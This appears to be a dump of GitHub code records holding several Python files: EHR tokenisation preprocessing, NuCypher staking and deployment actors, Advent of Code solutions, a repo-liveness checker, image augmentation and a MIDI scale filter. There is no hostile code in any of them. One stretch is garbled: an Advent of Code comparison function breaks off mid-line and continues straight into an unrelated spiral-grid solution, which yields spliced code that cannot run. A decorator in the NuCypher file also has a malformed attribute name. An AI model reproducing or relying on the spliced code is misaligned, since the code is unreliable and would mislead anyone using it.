list):\n return np.pad(lst, (0, 150-len(lst)), 'constant', constant_values=(0))\n\ndef numpy_array(lst :list):\n #Convert list to array\n return np.array(lst).tolist()\n\ndef word2index(word_list, vocabs):\n return vocabs[word_list]\n\ndef re_sub(x):\n return re.sub(r'[,|!?\"\\':;~()\\[\\]]', '', x)\n\ndef null_fill(df, value_mode):\n def _fillNA(seq, rp_value):\n return [rp_value if x!=x else x for x in seq ]\n \n if value_mode =='VC':\n df['value'] = df['value'].map(lambda x : _fillNA(x, 0.0))\n df['uom'] = df['uom'].map(lambda x : _fillNA(x, ' ')) \n else: \n df['value'] = df['value'].map(lambda x : _fillNA(x, ' '))\n df['uom'] = df['uom'].map(lambda x : _fillNA(x, ' '))\n \n return df\n\ndef agg_col(df, value_mode):\n def _agg(a, b):\n return [str(x) + str(y) for x,y in zip(a, b)]\n \n def _value_split(x):\n # value seq list\n seq = [' '.join(str(y)) for y in x ]\n return seq \n \n def _round(seq):\n return [round(x, 6) if type(x)==float else x for x in seq ]\n \n # NV => code_name \n # VA => code_name + value + uom\n # DSVA => code_name + value(split) + uom\n # VC => code_name + uom / value\n if value_mode == 'NV':\n df['code_name'] = pd.Series([list(map(str, a)) for a in df['code_name']])\n\n elif value_mode =='VA':\n df['value'] = df['value'].map(lambda x : _round(x))\n df['code_name'] = pd.Series([_agg(a,b) for a, b in zip(df['code_name'], df['value'])])\n df['code_name'] = pd.Series([_agg(a,b) for a, b in zip(df['code_name'], df['uom'])])\n \n elif value_mode =='DSVA':\n df['value'] = df['value'].map(lambda x : _round(x))\n df['value'] = df['value'].map(lambda x : _value_split(x))\n df['code_name'] = pd.Series([_agg(a,b) for a, b in zip(df['code_name'], df['value'])])\n df['code_name'] = pd.Series([_agg(a,b) for a, b in zip(df['code_name'], df['uom'])])\n\n elif value_mode =='VC':\n df['value'] = df['value'].map(lambda x : _round(x))\n df['code_name'] = pd.Series([_agg(a,b) for a, b in zip(df['code_name'], df['uom'])])\n\n return df\n\ndef making_vocab(df):\n vocab_dict = {}\n vocab_dict['[PAD]'] = 0\n vocab_dict['[CLS]'] = 1\n vocab_dict['[MASK]'] = 2\n\n df['merge_code_set'] = df['code_name'].apply(lambda x : list(set(x)))\n vocab_set = []\n for codeset in df['merge_code_set']:\n vocab_set.extend(codeset) \n vocab_set = list(set(vocab_set))\n for idx, vocab in enumerate(vocab_set):\n vocab_dict[vocab] = idx+3\n \n return vocab_dict\n \ndef _tokenized_max_length(vocab, tokenizer):\n tokenized_vocab= tokenizer(list(vocab.keys()))\n max_word_len = max(list(map(len, tokenized_vocab['input_ids'])))\n return max_word_len\n\ndef _organize(seq):\n return re.sub(r'[,|!?\"\\':;~()\\[\\]]', '', seq)\n\ndef tokenize_seq(seq, word_max_len, tokenizer):\n seq = list(map(_organize, seq))\n seq = ['[PAD]' if x=='0.0' else x for x in seq]\n tokenized_seq= tokenizer(seq, padding = 'max_length', return_tensors='pt', max_length=word_max_len)\n return tokenized_seq\n\n\ndef convert2numpy(input_path, output_path):\n value_mode_list = ['NV', 'DSVA', 'VC']\n sources = ['mimic','eicu']\n tokenizer= AutoTokenizer.from_pretrained(\"emilyalsentzer/Bio_ClinicalBERT\")\n for src in sources:\n save_path = f'{output_path}/input/{src}'\n filename = '{}_df.pkl'.format(src)\n df = pd.read_pickle(os.path.join(input_path, filename))\n print('{} input files load !'.format(src))\n for value_mode in value_mode_list:\n print(value_mode)\n save_name = f'{src}_input_index_{value_mode}'\n print('save_name', save_name)\n df = null_fill(df, value_mode)\n df = agg_col(df, value_mode)\n\n vocab = making_vocab(df)\n vocab['0.0'] = 0\n src2index= partial(word2index, vocabs=vocab)\n # input_index \n index =[list(map(src2index, icu)) for icu in df['code_name']]\n array = np.array(index)\n np.save(os.path.join(save_path, save_name), array)\n \n print('tokenization start!')\n # tokenized\n word_max_len = _tokenized_max_length(vocab, tokenizer)\n token_tmp = [tokenize_seq(seq, word_max_len, tokenizer) for seq in tqdm.tqdm(df['code_name'])]\n df['input_ids'] =pd.Series([token['input_ids'] for token in token_tmp])\n df['token_type_ids'] =pd.Series([token['token_type_ids'] for token in token_tmp])\n df['attention_mask'] =pd.Series([token['attention_mask'] for token in token_tmp])\n \n #tokenized save\n np.save(os.path.join(save_path, f'input_ids_{value_mode}.npy'), np.array(df['input_ids'])) \n np.save(os.path.join(save_path, f'token_type_ids_{value_mode}.npy'), np.array(df['token_type_ids'])) \n np.save(os.path.join(save_path, f'attention_mask_{value_mode}.npy'), np.array(df['attention_mask'])) \n\n if value_mode == 'NV':\n #value\n value = np.array([df['value']])\n np.save(os.path.join(save_path, 'value.npy'), value[0])\n\n\n if value_mode =='DSVA':\n df = digit_place_embed(df, tokenizer)\n np.save(os.path.join(save_path, f'input_ids_DSVA_DPE.npy'), np.array(df['input_ids'])) \n np.save(os.path.join(save_path, f'token_type_ids_DSVA_DPE.npy'), np.array(df['token_type_ids'])) \n np.save(os.path.join(save_path, f'attention_mask_DSVA_DPE.npy'), np.array(df['attention_mask']))\n \n \n \n #seq_len\n seq_len = np.array([df['seq_len']])\n np.save(os.path.join(save_path, 'seq_len.npy'), seq_len[0]) \n\n ","repo_name":"hoon9405/DescEmb","sub_path":"preprocess/numpy_convert.py","file_name":"numpy_convert.py","file_ext":"py","file_size_in_byte":6010,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"22"} +{"seq_id":"24926347322","text":"\"\"\"\nThis file is part of nucypher.\n\nnucypher is free software: you can redistribute it and/or modify\nit under the terms of the GNU Affero General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nnucypher is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU Affero General Public License for more details.\n\nYou should have received a copy of the GNU Affero General Public License\nalong with nucypher. If not, see .\n\"\"\"\n\nimport json\nfrom collections import OrderedDict\nfrom json import JSONDecodeError\n\nimport maya\nfrom constant_sorrow import constants\nfrom constant_sorrow.constants import CONTRACT_NOT_DEPLOYED, NO_DEPLOYER_ADDRESS\nfrom datetime import datetime\nfrom twisted.internet import task, reactor\nfrom twisted.logger import Logger\nfrom typing import Tuple, List, Dict, Union\n\nfrom nucypher.blockchain.eth.agents import NucypherTokenAgent, MinerAgent, PolicyAgent\nfrom nucypher.blockchain.eth.chains import Blockchain\nfrom nucypher.blockchain.eth.deployers import NucypherTokenDeployer, MinerEscrowDeployer, PolicyManagerDeployer, \\\n UserEscrowProxyDeployer, UserEscrowDeployer\nfrom nucypher.blockchain.eth.interfaces import BlockchainDeployerInterface\nfrom nucypher.blockchain.eth.registry import AllocationRegistry\nfrom nucypher.blockchain.eth.utils import (datetime_to_period,\n validate_stake_amount,\n validate_locktime,\n calculate_period_duration)\nfrom nucypher.blockchain.eth.token import NU, Stake\n\n\ndef only_me(func):\n def wrapped(actor=None, *args, **kwargs):\n if not actor.is_me:\n raise actor.MinerError(\"You are not {}\".format(actor.__class.__.__name__))\n return func(actor, *args, **kwargs)\n return wrapped\n\n\nclass NucypherTokenActor:\n \"\"\"\n Concrete base class for any actor that will interface with NuCypher's ethereum smart contracts.\n \"\"\"\n\n class ActorError(Exception):\n pass\n\n def __init__(self,\n checksum_address: str = None,\n blockchain: Blockchain = None\n ) -> None:\n \"\"\"\n :param checksum_address: If not passed, we assume this is an unknown actor\n\n :param token_agent: The token agent with the blockchain attached; If not passed, A default\n token agent and blockchain connection will be created from default values.\n\n \"\"\"\n try:\n parent_address = self.checksum_public_address # type: str\n if checksum_address is not None:\n if parent_address != checksum_address:\n raise ValueError(\"Can't have two different addresses.\")\n except AttributeError:\n self.checksum_public_address = checksum_address # type: str\n\n if blockchain is None:\n blockchain = Blockchain.connect()\n self.blockchain = blockchain\n\n self.token_agent = NucypherTokenAgent()\n self._transaction_cache = list() # type: list # track transactions transmitted\n\n def __repr__(self):\n class_name = self.__class__.__name__\n r = \"{}(address='{}')\"\n r = r.format(class_name, self.checksum_public_address)\n return r\n\n @property\n def eth_balance(self):\n \"\"\"Return this actors's current ETH balance\"\"\"\n balance = self.token_agent.blockchain.interface.w3.eth.getBalance(self.checksum_public_address)\n return self.blockchain.interface.w3.fromWei(balance, 'ether')\n\n @property\n def token_balance(self) -> NU:\n \"\"\"Return this actors's current token balance\"\"\"\n balance = int(self.token_agent.get_balance(address=self.checksum_public_address))\n nu_balance = NU(balance, 'NuNit')\n return nu_balance\n\n\nclass Deployer(NucypherTokenActor):\n\n __interface_class = BlockchainDeployerInterface\n\n def __init__(self,\n blockchain: Blockchain,\n deployer_address: str = None,\n bare: bool = True\n ) -> None:\n\n self.blockchain = blockchain\n self.__deployer_address = NO_DEPLOYER_ADDRESS\n if deployer_address:\n self.deployer_address = deployer_address\n\n if not bare:\n self.token_agent = NucypherTokenAgent(blockchain=blockchain)\n self.miner_agent = MinerAgent(blockchain=blockchain)\n self.policy_agent = PolicyAgent(blockchain=blockchain)\n\n self.user_escrow_deployers = dict()\n\n self.deployers = {\n NucypherTokenDeployer.contract_name: self.deploy_token_contract,\n MinerEscrowDeployer.contract_name: self.deploy_miner_contract,\n PolicyManagerDeployer.contract_name: self.deploy_policy_contract,\n UserEscrowProxyDeployer.contract_name: self.deploy_escrow_proxy,\n }\n\n def __repr__(self):\n r = '{name}({blockchain}, {deployer_address})'.format(name=self.__class__.__name__,\n blockchain=self.blockchain,\n deployer_address=self.deployer_address)\n return r\n\n @classmethod\n def from_blockchain(cls, provider_uri: str, registry=None, *args, **kwargs):\n blockchain = Blockchain.connect(provider_uri=provider_uri, registry=registry)\n instance = cls(blockchain=blockchain, *args, **kwargs)\n return instance\n\n @property\n def deployer_address(self):\n return self.blockchain.interface.deployer_address\n\n @deployer_address.setter\n def deployer_address(self, value):\n \"\"\"Used for validated post-init setting of deployer's address\"\"\"\n self.blockchain.interface.deployer_address = value\n\n @property\n def token_balance(self):\n if self.token_agent is CONTRACT_NOT_DEPLOYED:\n raise self.ActorError(\"Token contract not deployed\")\n return super().token_balance\n\n def deploy_token_contract(self):\n\n token_deployer = NucypherTokenDeployer(blockchain=self.blockchain, deployer_address=self.deployer_address)\n\n txhashes = token_deployer.deploy()\n self.token_agent = token_deployer.make_agent()\n return txhashes\n\n def deploy_miner_contract(self, secret: bytes):\n secret = self.blockchain.interface.w3.keccak(secret)\n miner_escrow_deployer = MinerEscrowDeployer(blockchain=self.blockchain,\n deployer_address=self.deployer_address,\n secret_hash=secret)\n\n txhashes = miner_escrow_deployer.deploy()\n self.miner_agent = miner_escrow_deployer.make_agent()\n return txhashes\n\n def deploy_policy_contract(self, secret: bytes):\n secret = self.blockchain.interface.w3.keccak(secret)\n policy_manager_deployer = PolicyManagerDeployer(blockchain=self.blockchain,\n deployer_address=self.deployer_address,\n secret_hash=secret)\n\n txhashes = policy_manager_deployer.deploy()\n self.policy_agent = policy_manager_deployer.make_agent()\n return txhashes\n\n def deploy_escrow_proxy(self, secret: bytes):\n secret = self.blockchain.interface.w3.keccak(secret)\n escrow_proxy_deployer = UserEscrowProxyDeployer(blockchain=self.blockchain,\n deployer_address=self.deployer_address,\n secret_hash=secret)\n\n txhashes = escrow_proxy_deployer.deploy()\n return txhashes\n\n def deploy_user_escrow(self, allocation_registry: AllocationRegistry):\n user_escrow_deployer = UserEscrowDeployer(blockchain=self.blockchain,\n deployer_address=self.deployer_address,\n allocation_registry=allocation_registry)\n\n user_escrow_deployer.deploy()\n principal_address = user_escrow_deployer.contract.address\n self.user_escrow_deployers[principal_address] = user_escrow_deployer\n return user_escrow_deployer\n\n def deploy_network_contracts(self, miner_secret: bytes, policy_secret: bytes) -> Tuple[dict, dict]:\n \"\"\"\n Musketeers, if you will; Deploy the \"big three\" contracts to the blockchain.\n \"\"\"\n token_txhashes = self.deploy_token_contract()\n miner_txhashes = self.deploy_miner_contract(secret=miner_secret)\n policy_txhashes = self.deploy_policy_contract(secret=policy_secret)\n\n txhashes = {\n NucypherTokenDeployer.contract_name: token_txhashes,\n MinerEscrowDeployer.contract_name: miner_txhashes,\n PolicyManagerDeployer.contract_name: policy_txhashes\n }\n\n agents = {\n NucypherTokenDeployer.contract_name: self.token_agent,\n MinerEscrowDeployer.contract_name: self.miner_agent,\n PolicyManagerDeployer.contract_name: self.policy_agent\n }\n\n return txhashes, agents\n\n def deploy_beneficiary_contracts(self,\n allocations: List[Dict[str, Union[str, int]]],\n allocation_outfile: str = None,\n allocation_registry: AllocationRegistry = None,\n ) -> None:\n \"\"\"\n\n Example allocation dataset (one year is 31540000 seconds):\n\n data = [{'address': '0xdeadbeef', 'amount': 100, 'duration': 31540000},\n {'address': '0xabced120', 'amount': 133432, 'duration': 31540000*2},\n {'address': '0xf7aefec2', 'amount': 999, 'duration': 31540000*3}]\n \"\"\"\n if allocation_registry and allocation_outfile:\n raise self.ActorError(\"Pass either allocation registry or allocation_outfile, not both.\")\n if allocation_registry is None:\n allocation_registry = AllocationRegistry(registry_filepath=allocation_outfile)\n for allocation in allocations:\n deployer = self.deploy_user_escrow(allocation_registry=allocation_registry)\n deployer.deliver(value=allocation['amount'],\n duration=allocation['duration'],\n beneficiary_address=allocation['address'])\n\n @staticmethod\n def __read_allocation_data(filepath: str):\n with open(filepath, 'r') as allocation_file:\n data = allocation_file.read()\n try:\n allocation_data = json.loads(data)\n except JSONDecodeError:\n raise\n return allocation_data\n\n def deploy_beneficiaries_from_file(self, allocation_data_filepath: str, allocation_outfile: str = None):\n allocations = self.__read_allocation_data(filepath=allocation_data_filepath)\n self.deploy_beneficiary_contracts(allocations=allocations, allocation_outfile=allocation_outfile)\n\n\nclass Miner(NucypherTokenActor):\n \"\"\"\n Ursula baseclass for blockchain operations, practically carrying a pickaxe.\n \"\"\"\n\n __current_period_sample_rate = 60*60 # seconds\n\n class MinerError(NucypherTokenActor.ActorError):\n pass\n\n def __init__(self, is_me: bool, start_staking_loop: bool = True, *args, **kwargs) -> None:\n super().__init__(*args, **kwargs)\n self.log = Logger(\"miner\")\n self.is_me = is_me\n\n if is_me:\n self.token_agent = NucypherTokenAgent(blockchain=self.blockchain)\n\n # Staking Loop\n self.__current_period = None\n self._abort_on_staking_error = True\n self._staking_task = task.LoopingCall(self._confirm_period)\n\n else:\n self.token_agent = constants.STRANGER_MINER\n\n self.miner_agent = MinerAgent(blockchain=self.blockchain)\n\n self.__stakes = constants.NO_STAKES\n self.__start_time = constants.NO_STAKES\n self.__uptime_period = constants.NO_STAKES\n self.__terminal_period = constants.NO_STAKES\n\n self.__read_stakes()\n if self.stakes and start_staking_loop:\n self.stake()\n\n #\n # Staking\n #\n @only_me\n def stake(self, confirm_now: bool = True) -> None:\n \"\"\"High-level staking looping call initialization\"\"\"\n # TODO #841: Check if there is an active stake in the current period: Resume staking daemon\n\n # Get the last stake end period of all stakes\n terminal_period = max(stake.end_period for stake in self.stakes.values())\n\n if confirm_now:\n self.confirm_activity()\n\n # record start time and periods\n self.__start_time = maya.now()\n self.__uptime_period = self.miner_agent.get_current_period()\n self.__terminal_period = self.__uptime_period + terminal_period\n self.__current_period = self.__uptime_period\n self.start_staking_loop()\n\n @only_me\n def _confirm_period(self):\n\n period = self.miner_agent.get_current_period()\n self.log.info(\"Checking for new period. Current period is {}\".format(self.__current_period))\n\n if self.__current_period != period:\n\n # check for stake expiration\n stake_expired = self.__current_period >= self.__terminal_period\n if stake_expired:\n self.log.info('Stake duration expired')\n return True\n\n self.confirm_activity()\n self.__current_period = period\n self.log.info(\"Confirmed activity for period {}\".format(self.__current_period))\n\n @only_me\n def _crash_gracefully(self, failure=None):\n \"\"\"\n A facility for crashing more gracefully in the event that an exception\n is unhandled in a different thread, especially inside a loop like the learning loop.\n \"\"\"\n self._crashed = failure\n failure.raiseException()\n\n @only_me\n def handle_staking_errors(self, *args, **kwargs):\n failure = args[0]\n if self._abort_on_staking_error:\n self.log.critical(\"Unhandled error during node staking. Attempting graceful crash.\")\n reactor.callFromThread(self._crash_gracefully, failure=failure)\n else:\n self.log.warn(\"Unhandled error during node learning: {}\".format(failure.getTraceback()))\n\n @only_me\n def start_staking_loop(self, now=True):\n if self._staking_task.running:\n return False\n else:\n d = self._staking_task.start(interval=self.__current_period_sample_rate, now=now)\n d.addErrback(self.handle_staking_errors)\n self.log.info(f\"Starting Staking Loop NOW - running until period {self.__terminal_period}\")\n return d\n\n @property\n def is_staking(self):\n \"\"\"Checks if this Miner currently has locked tokens.\"\"\"\n return bool(self.locked_tokens > 0)\n\n @property\n def locked_tokens(self):\n \"\"\"Returns the amount of tokens this miner has locked.\"\"\"\n return self.miner_agent.get_locked_tokens(miner_address=self.checksum_public_address)\n\n @property\n def total_staked(self) -> NU:\n if self.stakes:\n return NU(sum(int(stake.value) for stake in self.stakes.values()), 'NuNit')\n else:\n return NU(0, 'NuNit')\n\n def __read_stakes(self) -> None:\n stakes_reader = self.miner_agent.get_all_stakes(miner_address=self.checksum_public_address)\n stakes = dict()\n for index, stake_info in enumerate(stakes_reader):\n stake = Stake.from_stake_info(owner_address=self.checksum_public_address,\n stake_info=stake_info,\n index=index)\n stakes[index] = stake\n self.__stakes = stakes\n\n @property\n def stakes(self) -> Dict[str, Stake]:\n \"\"\"Return all cached stakes from the blockchain.\"\"\"\n return self.__stakes\n\n @only_me\n def deposit(self, amount: int, lock_periods: int) -> Tuple[str, str]:\n \"\"\"Public facing method for token locking.\"\"\"\n\n approve_txhash = self.token_agent.approve_transfer(amount=amount,\n target_address=self.miner_agent.contract_address,\n sender_address=self.checksum_public_address)\n\n deposit_txhash = self.miner_agent.deposit_tokens(amount=amount,\n lock_periods=lock_periods,\n sender_address=self.checksum_public_address)\n\n return approve_txhash, deposit_txhash\n\n @only_me\n def divide_stake(self,\n stake_index: int,\n target_value: NU,\n additional_periods: int = None,\n expiration: maya.MayaDT = None) -> dict:\n \"\"\"\n Modifies the unlocking schedule and value of already locked tokens.\n\n This actor requires that is_me is True, and that the expiration datetime is after the existing\n locking schedule of this miner, or an exception will be raised.\n\n :param stake_index: The miner's stake index of the stake to divide\n :param additional_periods: The number of periods to extend the stake by\n :param target_value: The quantity of tokens in the smallest denomination to divide.\n :param expiration: The new expiration date to set as an end period for stake division.\n :return: Returns the blockchain transaction hash\n\n \"\"\"\n\n if additional_periods and expiration:\n raise ValueError(\"Pass the number of lock periods or an expiration MayaDT; not both.\")\n\n stake = self.__stakes[stake_index]\n\n if expiration:\n additional_periods = datetime_to_period(datetime=expiration) - stake.end_period\n if additional_periods <= 0:\n raise self.MinerError(\"Expiration {} must be at least 1 period from now.\".format(expiration))\n\n if target_value >= stake.value:\n raise self.MinerError(f\"Cannot divide stake; Value ({target_value}) must be less \"\n f\"than the existing stake value {stake.value}.\")\n\n # Ensure both halves are for valid amounts\n validate_stake_amount(amount=target_value)\n validate_stake_amount(amount=stake.value - target_value)\n\n tx = self.miner_agent.divide_stake(miner_address=self.checksum_public_address,\n stake_index=stake_index,\n target_value=int(target_value),\n periods=additional_periods)\n\n self.blockchain.wait_for_receipt(tx)\n self.__read_stakes() # update local on-chain stake cache\n return tx\n\n @only_me\n def __validate_stake(self, amount: NU, lock_periods: int) -> bool:\n\n validate_stake_amount(amount=amount)\n validate_locktime(lock_periods=lock_periods)\n\n if not self.token_balance >= amount:\n raise self.MinerError(\"Insufficient miner token balance ({balance})\".format(balance=self.token_balance))\n else:\n return True\n\n @only_me\n def initialize_stake(self,\n amount: NU,\n lock_periods: int = None,\n expiration: maya.MayaDT = None,\n entire_balance: bool = False) -> dict:\n \"\"\"\n High level staking method for Miners.\n\n :param amount: Amount of tokens to stake denominated in the smallest unit.\n :param lock_periods: Duration of stake in periods.\n :param expiration: A MayaDT object representing the time the stake expires; used to calculate lock_periods.\n :param entire_balance: If True, stake the entire balance of this node, or the maximum possible.\n\n \"\"\"\n\n if lock_periods and expiration:\n raise ValueError(\"Pass the number of lock periods or an expiration MayaDT; not both.\")\n if entire_balance and amount:\n raise self.MinerError(\"Specify an amount or entire balance, not both\")\n\n if expiration:\n lock_periods = calculate_period_duration(future_time=expiration)\n\n if entire_balance is True:\n amount = self.token_balance\n\n amount = NU(int(amount), 'NuNit')\n\n staking_transactions = OrderedDict() # type: OrderedDict # Time series of txhases\n\n # Validate\n assert self.__validate_stake(amount=amount, lock_periods=lock_periods)\n\n # Transact\n approve_txhash, initial_deposit_txhash = self.deposit(amount=int(amount), lock_periods=lock_periods)\n self._transaction_cache.append((datetime.utcnow(), initial_deposit_txhash))\n\n staking_transactions['approve'] = approve_txhash\n staking_transactions['deposit'] = initial_deposit_txhash\n self.__read_stakes() # update local on-chain stake cache\n\n self.log.info(\"{} Initialized new stake: {} tokens for {} periods\".format(self.checksum_public_address, amount, lock_periods))\n return staking_transactions\n\n #\n # Reward and Collection\n #\n\n @only_me\n def confirm_activity(self) -> str:\n \"\"\"Miner rewarded for every confirmed period\"\"\"\n txhash = self.miner_agent.confirm_activity(node_address=self.checksum_public_address)\n self._transaction_cache.append((datetime.utcnow(), txhash))\n return txhash\n\n @only_me\n def mint(self) -> Tuple[str, str]:\n \"\"\"Computes and transfers tokens to the miner's account\"\"\"\n mint_txhash = self.miner_agent.mint(node_address=self.checksum_public_address)\n self._transaction_cache.append((datetime.utcnow(), mint_txhash))\n return mint_txhash\n\n def calculate_reward(self) -> int:\n staking_reward = self.miner_agent.calculate_staking_reward(checksum_address=self.checksum_public_address)\n return staking_reward\n\n @only_me\n def collect_policy_reward(self, collector_address=None, policy_agent: PolicyAgent = None):\n \"\"\"Collect rewarded ETH\"\"\"\n policy_agent = policy_agent if policy_agent is not None else PolicyAgent(blockchain=self.blockchain)\n\n withdraw_address = collector_address or self.checksum_public_address\n policy_reward_txhash = policy_agent.collect_policy_reward(collector_address=withdraw_address, miner_address=self.checksum_public_address)\n self._transaction_cache.append((datetime.utcnow(), policy_reward_txhash))\n return policy_reward_txhash\n\n @only_me\n def collect_staking_reward(self) -> str:\n \"\"\"Withdraw tokens rewarded for staking.\"\"\"\n collection_txhash = self.miner_agent.collect_staking_reward(checksum_address=self.checksum_public_address)\n self._transaction_cache.append((datetime.utcnow(), collection_txhash))\n return collection_txhash\n\n\nclass PolicyAuthor(NucypherTokenActor):\n \"\"\"Alice base class for blockchain operations, mocking up new policies!\"\"\"\n\n def __init__(self, checksum_address: str, *args, **kwargs) -> None:\n \"\"\"\n :param policy_agent: A policy agent with the blockchain attached; If not passed, A default policy\n agent and blockchain connection will be created from default values.\n\n \"\"\"\n super().__init__(checksum_address=checksum_address, *args, **kwargs)\n\n # From defaults\n self.token_agent = NucypherTokenAgent(blockchain=self.blockchain)\n self.miner_agent = MinerAgent(blockchain=self.blockchain)\n self.policy_agent = PolicyAgent(blockchain=self.blockchain)\n\n def recruit(self, quantity: int, **options) -> List[str]:\n \"\"\"\n Uses sampling logic to gather miners from the blockchain and\n caches the resulting node ethereum addresses.\n\n :param quantity: Number of ursulas to sample from the blockchain.\n\n \"\"\"\n\n miner_addresses = self.miner_agent.sample(quantity=quantity, **options)\n return miner_addresses\n\n def create_policy(self, *args, **kwargs):\n \"\"\"\n Hence the name, a PolicyAuthor can create\n a BlockchainPolicy with themself as the author.\n\n :return: Returns a newly authored BlockchainPolicy with n proposed arrangements.\n\n \"\"\"\n\n from nucypher.blockchain.eth.policies import BlockchainPolicy\n blockchain_policy = BlockchainPolicy(alice=self, *args, **kwargs)\n return blockchain_policy\n","repo_name":"NoskovIvan/Coinlist-NuCypher-Hackathon","sub_path":"nucypher/blockchain/eth/actors.py","file_name":"actors.py","file_ext":"py","file_size_in_byte":24730,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"27541985045","text":"#!/usr/bin/env python3\nimport sys\n\ninputfile = sys.argv[1] if len(sys.argv) > 1 else \"input.txt\"\ndata = open(inputfile).read().strip()\npairs = data.split(\"\\n\\n\")\nlines = list(map(eval, data.split()))\n\n\ndef compare(l, r):\n if type(l) == int:\n if type(r) == int:\n # in right order l num:\n break\n\n # Get the positions of the ring's corners\n x, y = width // 2, -(width // 2)\n bl = -x, y\n tl = -x, -y\n tr = x, -y\n move = (-1, 0)\n\n # Go backwards around the ring to reach the number\n for _ in range(ring_max - num):\n x += move[0]\n y += move[1]\n\n if (x, y) == bl:\n move = (0, 1)\n elif (x, y) == tl:\n move = (1, 0)\n elif (x, y) == tr:\n move = (0, -1)\n\n return abs(x) + abs(y)\n\n\ndef fill_surrounding_sum(S, x, y, num):\n surroundings = [\n (x+1, y), (x-1, y),\n (x+1, y+1), (x, y+1), (x-1, y+1),\n (x+1, y-1), (x, y-1), (x-1, y-1),\n ]\n total = sum(S.get((a, b), 0) for a, b in surroundings)\n if total > num:\n print(total)\n exit(0)\n S[(x, y)] = total\n\n\ndef solve2(num):\n S = {(0, 0): 1}\n width = 1\n x, y = 0, 0\n\n while True:\n width += 2\n\n # Right\n x += 1\n fill_surrounding_sum(S, x, y, num)\n\n # Up\n for _ in range(width - 2):\n y += 1\n fill_surrounding_sum(S, x, y, num)\n\n # Left\n for _ in range(width - 1):\n x -= 1\n fill_surrounding_sum(S, x, y, num)\n\n # Down\n for _ in range(width - 1):\n y -= 1\n fill_surrounding_sum(S, x, y, num)\n\n # Right\n for _ in range(width - 1):\n x += 1\n fill_surrounding_sum(S, x, y, num)\n\n\nif __name__ == '__main__':\n raw = stdin.read().strip()\n print(solve2(int(raw)))\n","repo_name":"jonstaryuk/advent-of-code","sub_path":"2017/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"27653472097","text":"import json\nimport logging\nimport os\nimport sys\n\nlogging.basicConfig(level=os.environ.get('LOG_LEVEL', 'warning').upper())\n\ndata = sys.stdin.read()\ntry:\n repo = json.loads(data)\n logging.debug(\"repo: %s\", repo)\nexcept:\n logging.exception(\"error parsing response\")\n repo = None\nif not repo:\n logging.error(\"%s could not be read ❌\", sys.argv[1])\nelif repo.get(\"message\", \"\") == \"Moved Permanently\":\n logging.error(\"%s has moved permanently ❌\", sys.argv[1])\nelif repo.get(\"message\", \"\") == \"Not Found\":\n logging.error(\"%s does not exist ❌\", sys.argv[1])\nelif repo.get(\"archived\", False):\n logging.error(\"%s has been archived ❌\", sys.argv[1])\nelif repo.get(\"has_issues\") is False:\n logging.error(\"%s has issues disabled ❌\", sys.argv[1])\nelif \"documentation_url\" in repo:\n message = repo.get(\"message\", \"🤷🏻‍♂️\")\n logging.critical(\"'%s' when reading %s\", message, sys.argv[1])\nelse:\n logging.info(\"%s is okay ✅\", sys.argv[1])\n sys.exit(0)\n\nsys.exit(1)\n","repo_name":"oh-my-fish/packages-main","sub_path":".github/workflows/check-dead-repos.py","file_name":"check-dead-repos.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":221,"dataset":"github-code","pt":"22"} +{"seq_id":"70823359736","text":"from numpy import expand_dims\nfrom keras.preprocessing.image import load_img, save_img\nfrom keras.preprocessing.image import img_to_array\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom flask_upload.handling import *\nimport time\n\n\n# path = '\\\\detect_3\\\\train_img/tung\\\\'\n\n\n# Dinh nghia 1 doi tuong Data Generator voi bien phap chinh sua anh dieu chinh do sang tu 0.5% den 2.0%\ndef image_processes(file_img='', type = '', sl=2):\n if not file_img:\n return None\n img = load_img(file_img)\n img = img_to_array(img)\n data = expand_dims(img, 0)\n myImageGen = None\n if type == 'brightness':\n myImageGen = ImageDataGenerator(brightness_range=[0.5, 2.0])\n elif type == 'flip':\n myImageGen = ImageDataGenerator(horizontal_flip=True, vertical_flip=True)\n elif type == 'rotate':\n myImageGen = ImageDataGenerator(rotation_range=45)\n elif type == 'shear':\n myImageGen = ImageDataGenerator(shear_range=45)\n elif type == 'shift':\n myImageGen = ImageDataGenerator(width_shift_range=[-150,150])\n if not myImageGen:\n return False\n gen = myImageGen.flow(data, batch_size=1)\n for i in range(sl):\n myBatch = gen.next()\n image = myBatch[0].astype('uint8')\n name_folder, path, name, extension = get_name_and_path_by_path_image(file_img)\n img = get_path_image('train_img\\\\' + name_folder, name + str(time.time()).replace('.', '') + '_' + type + '.' + extension)\n save_img(img, image)\n return True\n\n\n","repo_name":"daoductung/face_recognition","sub_path":"flask_upload/handling_image.py","file_name":"handling_image.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"39879497968","text":"import isobar as iso\nfrom MidiApp import MidiApp\n\n\n## Snaps incoming notes to the C major scale\nclass ScaleFilter(MidiApp):\n\n def midi_callback(self, message):\n if message.type == \"note_on\" or message.type == \"note_off\":\n note = message.note\n semitone = (note % 12)\n octave = int(note / 12)\n semitone_in_scale = self.notes_lookup[semitone]\n message.note = semitone_in_scale + 12 * octave\n self.timeline.output_device.midi.send(message)\n\n def start(self):\n self.notes_lookup = [0, 0, 2, 2, 4, 5, 5, 7, 7, 9, 9, 11]\n\nif __name__ == \"__main__\":\n app = ScaleFilter(use_midi_callback=True)\n app.run()\n","repo_name":"rvega/midi-music","sub_path":"01_ScaleFilter.py","file_name":"01_ScaleFilter.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26200473970","text":"import numpy as np\n\n# 生成三类数据,每类数据有100个样本\nnp.random.seed(42)\nclass1 = np.random.randn(100, 2) * 0.5 + np.array([1, 1])\nclass2 = np.random.randn(100, 2) * 0.5 + np.array([-1, -1])\nclass3 = np.random.randn(100, 2) * 0.5 + 